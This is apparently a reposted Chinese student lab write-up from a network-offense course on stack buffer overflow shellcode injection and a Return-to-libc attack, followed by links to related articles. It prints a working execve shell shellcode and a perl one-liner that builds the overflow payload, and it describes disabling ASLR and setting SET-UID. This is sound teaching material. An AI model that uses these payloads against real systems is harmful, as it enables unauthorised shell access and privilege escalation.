20145315《网络对抗》——注入shellcode以及 Return-to-libc攻击实验

最新推荐文章于 2020-09-15 13:53:04 发布
最新推荐文章于 2020-09-15 13:53:04 发布
阅读量129 收藏
点赞数
原文链接:http://www.cnblogs.com/5315hejialei/p/6522882.html
版权

shellcode

准备一段Shellcode

我用的老师的shellcode:\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00

环境设置

  • 设置堆栈可执行
  • 关闭地址随机化
    886825-20170308202135578-1686881406.png

然后,跳进了坑里

  • 用结构为:nops+shellcode+retaddr进行了shellcode注入
  • 6个nop+shellcode+返回地址,返回地址先用\x4\x3\x2\x1代替,之后确定具体值
  • 准备好了注入文件用00结尾
  • 然后把shellcode注入pwn1
    886825-20170308202237938-1018404018.png

确定注入的shellcode的地址

  • 打开一个新的终端,进行GDB调试
  • 设置断点
  • 寻找esp指向的地址
  • 在附近寻找shellcode的地址
  • 然后继续执行,确定返回地址所占的位置是否正确

886825-20170308202305109-1052614271.png

886825-20170308202400141-277720024.png

886825-20170308202439641-1923927162.png

失败了

然后,把\x4\x3\x2\x1替换为内存中shellcode的地址
注入后运行shell,失败,原因是指令被覆盖了

886825-20170308202613922-1720978087.png

从坑里爬起来继续

  • 这次构造的是结构为:anything+retaddr+nops+shellcode
  • perl -e 'print "A" x 32;print "\x30\xd3\xff\xff\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode
  • 成功
    886825-20170308202702797-1192667276.png

Return-to-libc攻击实验

准备工作,使用另一个 shell 程序(zsh)代替/bin/bash。

886825-20170326204624252-1191918475.png

漏洞程序

  • retlib
    886825-20170326204953065-2089020324.png
  • 编译该程序,并设置 SET-UID
    886825-20170326205404627-858751623.png

读取环境变量的程序

886825-20170326205436580-214397469.png

攻击程序

886825-20170326205622783-1545879133.png

获取内存地址

886825-20170326205657018-2081820921.png

gdb 获得 system 和 exit 地址

886825-20170326205731565-1504465485.png

修改 exploit.c 文件,填上刚才找到的内存地址

886825-20170326205752393-1787535181.png

攻击

886825-20170326205905955-259349911.png

转载于:https://www.cnblogs.com/5315hejialei/p/6522882.html

weixin_30929011
关注
linux编写shellcode
duangduang2020的博客
11-21 1042
1、shellcode需要用到系统调用的调用号,可以通过unistd.h查看,具体某个系统调用的用法可以通过man syscall来查看 2、在现在的指令集中引入了syscall指令,但是原来的int 0x80调用正常可以使用。int 0x80调用将系统调用号放在eax, 参数依次放在ebx, ecx, edx, esi, edi;超过5个的将参数放在内存中,并将内存地址放在ebx寄存器中。 (
Return-to-libc攻击实验
weixin_45930204的博客
12-05 906
文章目录一、实验描述二、实验准备2.1 输入命令安装一些用于编译 32 位 C 程序的软件包2.2 输入命令 linux32 进入 32 位 linux 环境,输入 /bin/bash 使用 bash![在这里插入图片描述](https://img-blog.csdnimg.cn/6e05f6fd509642b0964eae0d5b4410fa.png)三、实验步骤3.1初始设置 一、实验描述        缓冲区溢出的常用攻击方法是用
栈溢出
每昔的博客
07-27 685
漏洞原理:         栈溢出指的是程序向栈中某个变量中写入的字节数超过了这个变量本身所申请的字节数,因而导致栈中与其相邻的变量的值被改变。若输入足够多的、精心挑选的字符,将改写函数的返回地址(也可以是jmp、call指令的跳转地址),由此获取对CPU的控制,从而执行任何任意操作。 实验环境:Ubuntu16.0、gdb 漏洞程序: #include <stdio.h> ...
栈溢出攻击1——注入shellcode指令拿到shell
学习记录
09-15 2091
  在IDA的Function name这一栏里面,如下图所示,没有发现后门函数,说明这道题目需要自己写shellcode来拿到shell权限。 查看sub_80484E9函数的伪代码,如下所示。 int sub_80484E9() { char v1; // [esp+0h] [ebp-28h] puts("Could I know your name?"); myRead((int)&unk_804A060, 32); printf("Hi, %s.\n", &unk
2018-2019-2 《网络对抗技术》Exp1 PC平台逆向破解 20165222
weixin_30633949的博客
03-16 114
Exp1 PC平台逆向破解 1,掌握NOP, JNE, JE, JMP, CMP汇编指令的机器码 NOP:空指令,作用就是直接跳到下一指令。机器码为:90。 JNE:判断0标志位,不等于0跳转。机器码为:75。 JE:判断0标志位,等于0跳转。机器码为:74。 JMP:无条件跳转。机器码为:eb。 CMP:比较后面两个值,即第一个减第二个,只影响标志位。机器码为:83。...
Python经典栈缓冲区溢出获取root权限
我的学习笔记
02-28 2584
是Python2还是3我给忘记了,大家自己试试吧。#!/usr/bin/env python #-*-coding:utf-8-*- #exp.py import struct from subprocess import call #Stack address where shellcode is copied. ret_addr = 0xbffff...
Return-to-libc攻击实验-内含源码以及设计说明书(可以自己运行复现).zip
最新发布
05-08
**Return-to-libc攻击实验详解** 在网络安全领域,Return-to-libc(Ret2libc攻击是一种经典的栈溢出利用技术,常用于绕过数据执行防止(DEP)机制。本实验旨在通过源码分析和实际操作,帮助学习者理解并掌握这种...
复旦大学_软件安全_SEED labs_2-Return_to_libc.zip
06-27
总的来说,《复旦大学_软件安全_SEED labs_2-Return_to_libc实验是软件安全学习的重要实践环节,它不仅提供了理论知识,也强调了动手实践,使学生能够全面理解和应对Return-to-libc这类高级攻击,提升网络安全防护...
Lab2-Return-To-Libc
11-10
本资料包“Lab2-Return-To-Libc”提供了相关的代码示例、实验说明以及相关论文,旨在深入探讨这一高级攻击手段。 Return-to-libc攻击是缓冲区溢出攻击的一种变种,它不依赖于执行已知的shellcode,而是利用程序...
20145305 《网络对抗注入Shellcode并执行&Return-to-libc 攻击实验
weixin_30381317的博客
03-04 104
注入Shellcode并执行 实践指导书 实践过程及结果截图 准备一段Shellcode 我这次实践和老师用的是同一个 设置环境 构造要注入的payload 我决定将返回地址改为0xffffd3a0 跟着老师跳坑失败了 查找原因。同上面步骤运行,gdb调试。 重新开始 看到 01020304了,就是返回地址的位置。shellcode就挨着,所以地址是 0xffffd3c0 终于成功...
pediy18-2
WocW的博客
03-20 356
整数溢出 存储大于最大支持值的值称为整数溢出。整数溢出本身不会导致任意代码执行,但是整数溢出可能会导致堆溢出或者栈溢出,从而导致任意代码执行。 数据类型大小以及范围: 对于代码: //vuln.c #include <stdio.h> #include <string.h> #include <stdlib.h> void store_passw...
CTF中的PWN——无安全防护(栈溢出)
壊壊的诱惑你的博客
09-20 2570
前言 今天心情不错,人最大的敌人真的就是自己!!! 好久没学PWN和逆向了,今天写一篇关于CTF中PWN的文章回忆一下。本文主要讲的是利用栈溢出的基础PWN,分别有使用shellcode类型、满足函数条件类型及使用软件自带system函数类型,其中自带system函数的类型软件因为传参方式不同进而分为32bit与64bit的软件。 满足函数条件类型 很low的命名...
Linux Exploit系列之三 Off-By-One 漏洞 (基于栈)
weixin_30652897的博客
05-05 151
Off-By-One 漏洞 (基于栈) 原文地址:https://bbs.pediy.com/thread-216954.htm 什么是off by one? 将源字符串复制到目标缓冲区可能会导致off by one 1、源字符串长度等于目标缓冲区长度。 当源字符串长度等于目标缓冲区长度时,单个NULL字节将被复制到目标缓冲区上方。这里由于目标缓冲区位于堆栈中,所以单个NULL字节可以覆...
linux下执行shellcode
天元喜羊羊的博客
01-23 5404
参考了其他文章。   C语言代码如下: #include #include char sc[] = "\x31\xc0" "\x50" "\x68\x6e\x2f\x73\x68" "\x68\x2f\x2f\x62\x69" "\x89\xe3" "\x50" "\x53" "\x89\xe1" "\xb0\x0b" "\
在内存中读取函数的ShellCode并执行
十年磨一剑,霜刃未曾试!
12-28 3914
在内存中读取函数的ShellCode并执行 下面是一个例子,实现的效果是将fun1函数的十六进制读取出来,在内存中将str1的地址改成str2,分配一块内存,将改好的函数的ShellCode写入并执行。
20145324王嘉澜 《网络对抗》进阶实践之 shellcode注入Return-to-libc攻击深入
weixin_30451709的博客
03-09 104
Shellcode注入Shellcode实际是一段代码,但却作为数据发送给受攻击服务器,将代码存储到对方的堆栈中,并将堆栈的返回地址利用缓冲区溢出,覆盖成为指向 shellcode的地址 •实验参考 •实践过程 •生成shellcode(本次使用老师的shellcode) •运行编译 •首先安装execstack这个指令 •设置环境 参数“2”表示开启,参数“0”表示关闭 •构造要注...
黑客编程之初识ShellCode技术
黑客编程技术博文
02-19 1667
什么是shellcode: 1996年,Aleph One在Underground发表了著名论文《SMASHING THE STACK FOR FUN AND PROFIT》,其中详细描述了Linux系统中栈的结构和如何利用基于栈的缓冲区溢出。在这篇具有划时代意义的论文中,Aleph One演示了如何向进程中植入一段用于获得shell的代码,并在论文中称这段被植入进程的代码为“shellcode”...
Shellcode 开发关键技术
AlexYoung28的博客
10-15 1320
1. 位置代码无关性技术 定义:位置无关代码(PIC)是指不适用硬编码地址来寻址指令或数据的代码。 必要性:因为Shellcode被加载到内存地址执行时,指令的内存地址是不确定的。 2.如何获取Shellcode起始位置 Shellcode在以位置无关方式访问时,首先需要引用一个 基址指针,用该基址指针加上或减去一定的偏移,从而顺利 的访问shellcode中包含的数据。  Shel...
Shellcode攻击实验
Atlas2013的专栏
10-18 3642
首先,先要知道什么是shellcodeShellcode实际是一段代码(也可以是填充数据),是用来发送到服务器利用特定漏洞的代码,一般可以获取权限。详见维基百科shellcode介绍:http://en.wikipedia.org/wiki/Shellcode
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值